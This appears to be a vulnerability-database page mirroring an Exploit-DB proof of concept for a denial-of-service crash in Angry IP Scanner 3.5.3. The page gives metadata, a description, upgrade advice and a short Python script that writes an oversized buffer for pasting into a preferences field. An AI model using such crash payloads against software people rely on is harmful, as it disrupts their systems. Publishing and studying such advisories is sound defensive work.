header-logo
Suggest Exploit
vendor:
Angry IP Scanner
by:
Fernando Cruz
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Angry IP Scanner
Affected Version From: 3.5.3
Affected Version To: 3.11
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro, 64-bit
2018

Angry IP Scanner 3.5.3 Denial of Service (PoC)

A denial of service vulnerability exists in Angry IP Scanner 3.5.3 due to a buffer overflow when copying a large amount of data to the clipboard. An attacker can exploit this vulnerability by running a python code to create a file with a large amount of data, copying the data to the clipboard, and then pasting it into the 'El valor no está disponible (sin resultados):' field in the 'Preferencias' tab of the 'Herramientas' toolbar. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Angry IP Scanner.
Source

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: cp1252 -*-
# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
# Author: Fernando Cruz
# Date: 13/12/2018
# Vendor Homepage: https://angryip.org
# Tested Version: 3.11
# Tested on Windows 10 Pro, 64-bit

# Steps to Produce the Crash: 
# 1.- Run python code : python angryip.py
# 2.- Open angryip.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
# 6.- Crashed

buffer = "\x41" * 44455293
f = open("angryip.txt" , 'w')
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR